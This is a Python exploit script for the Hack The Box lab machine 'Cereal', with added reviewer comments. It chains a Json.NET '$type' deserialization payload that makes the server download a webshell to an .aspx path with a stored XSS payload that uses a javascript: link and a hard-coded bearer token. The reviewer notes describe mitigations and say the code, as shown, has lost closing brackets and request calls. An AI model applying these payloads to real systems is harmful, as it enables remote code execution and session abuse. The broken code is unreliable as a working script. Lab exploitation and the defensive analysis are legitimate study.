An exploit for HTB Cereal
import sys
import requests
from urllib3.exceptions import InsecureRequestWarning
# NOTE(review): as rendered on this page the script is not syntactically
# complete -- the dict literals opened at 'auth_header', 'serial_payload' and
# 'trigger_payload' are never closed, and both the 'xss_req1 =' and
# 'xss_req2 =' lines have lost the call expression before their first comma
# (extraction damage). Nothing below is altered; comments only.
webshell_url = ''  # left empty in the gist; spliced verbatim into the 'URL' field further down
target_url = 'https://cereal.htb/requests'
# Hard-coded bearer credential. The literal is an HS256 JWT whose payload
# carries only an 'exp' claim, so it is time-limited -- but it is still a live
# secret: anyone who can read this gist can replay it until it expires, and it
# should never have been committed in the clear.
token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2MjM4MTgwMzh9.XAcgRqhpgyJARsBMEWg1UOlUeRnQU4bvbk1SpAv3vDM'
# Set authentication header
auth_header = {
'Authorization': f'Bearer {token}'
# Serialized Cereal.DownloadHelper
# Insert serialized object to cereal.db
# Send it via cereal request.
# Input validation is on the client side,
# so the app will just store this in serialized form
# (RequestsController.cs line 16-31)
# Root cause, from a defender's view: the '$type' key in the body below is the
# Json.NET polymorphic type discriminator, i.e. the server deserialises the
# stored JSON with TypeNameHandling enabled and lets the client choose the
# concrete .NET type. The mitigation is TypeNameHandling.None (or a strict
# SerializationBinder allow-list) together with server-side validation of the
# request body -- client-side checks alone are bypassed by sending the request
# directly, which is exactly what this script does.
serial_payload = {
"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"'+webshell_url+'","FilePath":"C:/inetpub/source/uploads/iamf.aspx"}'
# NOTE(review): the request call on this line is truncated on the page.
# 'verify=False' disables TLS certificate checking for it; note that the
# InsecureRequestWarning imported at the top is never actually silenced.
xss_req1 =, headers=auth_header, json=serial_payload, verify=False)
# A non-200 response only prints a message; the script still falls through to
# xss_req1.json()['id'] below, which raises if the body is not the expected
# JSON. 'sys' is imported but sys.exit() is never called.
if xss_req1.status_code != 200:
print('[-] Bad request')
print("[+] Serialized object sent")
request_id = xss_req1.json()['id']
print(f"[+] Triggering request at {target_url}/{request_id} with XSS")
# Triggers GET request /request/{id} via another XSS,
# The request handled by RequestsController.cs line 35-51
# superfluous encode
# The snippet below is a percent-encoded XMLHttpRequest that issues a
# synchronous GET from whatever browser context renders the title, attaching
# the same bearer token via setRequestHeader. .replace("\n", "") flattens it
# to a single line so it can be embedded inside the title string below.
xhr = f'''
r = new XMLHttpRequest;, %22{target_url}/{request_id}%22, false%29;
r.setRequestHeader%28%22Authorization%22, %22Bearer {token}%22%29;
'''.replace("\n", "")
# The title is a markdown-style link whose target is a 'javascript:' URL
# (stored XSS once rendered). Defender's note: wherever this field is
# displayed, the markdown/link handler must reject non-http(s) URI schemes or
# sanitise its output, and the page should ship a Content-Security-Policy
# that blocks inline script so a rendering slip cannot execute.
trigger_payload = {
"json": f'{{"title":"[XSS](javascript: document.write`{xhr}`)","flavor":"bacon","color":"#FFF","description":"test"}}'
# NOTE(review): call expression truncated on the page, as for xss_req1 above.
xss_req2 =, headers=auth_header, json=trigger_payload, verify=False)
# As above, a bad status is only printed, not acted upon.
if xss_req2.status_code != 200:
print("[-] Bad request ")